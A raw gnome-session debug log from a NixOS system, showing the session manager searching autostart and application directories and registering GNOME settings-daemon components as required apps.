machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Power.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Power.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App8 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.Power.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.PrintNotifications.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.PrintNotifications.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.PrintNotifications.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App9 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.PrintNotifications.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Rfkill.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Rfkill.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Rfkill.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App10 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.Rfkill.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.ScreensaverProxy.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
